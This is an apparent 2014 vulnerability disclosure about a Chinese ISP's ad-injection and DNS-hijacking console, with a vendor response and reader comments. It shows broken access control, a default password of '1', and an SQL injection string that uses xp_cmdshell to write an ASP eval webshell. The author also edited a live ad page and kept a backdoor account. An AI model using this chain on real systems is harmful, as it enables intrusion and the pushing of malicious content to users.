中国铁通宽带广告投放系统存在严重安全问题（可推送挂马）

前阶段电脑莫名其妙的随机跳转hao123 一号店等地址 搞的我以为电脑中毒了

最近倒是不跳了 不管登陆什么网站 右下角总弹出一些风格一样的广告

F12看了一下广告图片的地址

**.**.**.**:6699/FilesUp/5e1e6923-4205-452d-bc25-6ed0855cb22a.gif

查下IP地址: **.**.**.**辽宁省沈阳市 铁通

这不我大铁通的IP么 难道被劫持了？

百度之 果然是运营商劫持 顿时我就不开心了 本来前几天学长们毕业心情就不好 你还给我弹广告！

扫描了一下 找到两个后台地址：

**.**.**.**:808

**.**.**.**:6789

简单试了一下弱口令 万能密码 无效...好失落...

丢到wwwsacn里 也没扫到什么用处较大的信息

不过根据以前的经验 猜到这类外观比较挫的网站安全性都比较差 就开始试能不能越权

越权漏洞：

**.**.**.**:6789/ManageFrame/left.aspx

不行

**.**.**.**:6789/ManageFrame/top.aspx

哎呦 这个可以！虽然用处不大...不过 总比啥都没有强！

下载了帮助文档...发现原来这个系统还可以DNS劫持！

之后又是一顿瞎猜 不过没什么收货了

不过那个个人设置吸引了我的注意力

**.**.**.**:6789/Common/UserManage/UserEditOneself.aspx

估计因为没参数 所以内容都是空白的

不过他的文件命名引起了我的兴趣 尝试修改了一下

**.**.**.**:6789/Common/UserManage/UserEdit.aspx

哎呦 路径被爆出来了

换808那个后台再访问下

**.**.**.**:808/Common/UserManage/UserEdit.aspx

页面成功加载出来了

然后 手欠的点了下取消 人品顿时爆发了

**.**.**.**:808/Common/UserManage/UserList.aspx

这个用户有点少 我们换回6789

我尝试添加了一个用户 成功了 不过登陆时提示未分配角色

但创建用户时的一句话引起了我的注意

初始密码为1

越权页面：

**.**.**.**:6789/Common/UserManage/UserList.aspx

添加用户

**.**.**.**:6789/Common/Common_Role/RoleList.aspx

给予管理权限

密码弱口令：

随便找了个账号 就第一个吧 密码1 哦也 进去了~

不过这都不是我的目的啊

我需要的是管理账号给自己的账号加白名单啊！然后我想到了注入！

注入点：

突然想到在**.**.**.**:6789/Common/UserManage/UserList.aspx

还有搜功能 会不会存在注入呢？来个引号试试！

人品再次爆发！

然后发现竟然是sa权限 xp_cmdshell还没删除 发完这个漏洞我觉得我应该去买个彩票

路径也有了 直接写shell啊！

直接搜索cttjs';exec master..xp_cmdshell 'echo ^<%eval request(Chr(97))%^>>f:/浙江/IIOSManageWeb_主线08211/Common/UserManage/a.asp';--

写入一句话**.**.**.**:808/Common/UserManage/a.asp a

推送挂马：

入侵期间发现广告的一些管理页面无法访问 做了IP限制？

不过这阻止不了有心的黑客们

翻了一下 找到了广告页面的文件 F:/IIIOS素材/Default.aspx

修改下 加点语句 神不知鬼不觉...

白名单账号求不删！

厂商回应：

危害等级：高

漏洞Rank：15

确认时间：2014-07-12 12:59

厂商回复：

CNVD确认并复现所述情况，已经转由CNCERT直接通报给中国移动集团公司，由其后续下发工单给原铁通单位处置。按运行安全风险评分，rank 15

最新状态：

暂无

1. 2014-07-07 20:31 | 小小泥娃 ( 路人 | Rank:20 漏洞数:4 | 高二)

   0

   哈哈哈哈哈，这个屌

   1# 回复此人

2. 2014-07-08 09:16 | 毕月乌 ( 普通白帽子 | Rank:120 漏洞数:16 | 猜猜我是谁？)

   0

   这个描述有意思

   2# 回复此人

3. 2014-07-08 11:31 | chock ( 普通白帽子 | Rank:156 漏洞数:33 | 若你喜欢怪人)

   1

   同用铁通，被坑大了

   3# 回复此人

4. 2014-07-12 16:02 | 秀在我心 ( 路人 | Rank:0 漏洞数:1 | 走走停停)

   0

   现在铁通和移动是一家

   4# 回复此人

5. 2014-08-12 15:19 | pandas ( 普通白帽子 | Rank:730 漏洞数:84 | 国家特级保护动物)

   0

   学长毕业你伤心什么，你又不是妹子

   5# 回复此人

6. 2014-08-14 03:51 | Gosuto ( 实习白帽子 | Rank:40 漏洞数:5 | )

   0

   @pandas 还有学姐啊！

   6# 回复此人

7. 2014-08-21 20:07 | 低调 ( 实习白帽子 | Rank:42 漏洞数:18 | .......)

   1

   学长毕业你伤心什么，你又不是妹子

   7# 回复此人

8. 2014-08-22 17:06 | latershow ( 路人 | Rank:24 漏洞数:6 | andr0day)

   0

   学长毕业你伤心什么，你又不是妹子

   8# 回复此人

9. 2014-09-04 16:00 | 乐乐、 ( 普通白帽子 | Rank:878 漏洞数:190 )

   0

   @latershow @低调 @pandas 也许要怀疑的是性取向

   9# 回复此人